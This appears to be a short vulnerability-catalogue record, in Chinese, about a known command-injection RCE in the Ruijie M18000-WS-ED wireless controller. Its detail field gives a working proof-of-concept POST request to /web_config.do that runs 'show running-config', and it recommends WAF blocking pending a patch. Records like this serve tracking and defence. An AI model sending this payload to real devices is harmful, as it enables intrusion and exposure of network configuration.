vendor = "锐捷"
name = "锐捷M18000-WS-ED无线控制器存在CRL命令注入"
type = "RCE"
version = "M18000"
path = "/web_config.do"
detail = "POST /web_config.do HTTP/1.1 command=show+running-config&mode_url=exec"
fix = "WAF封禁路路径，等待发布补丁"
date = "0726"
label = "nday"
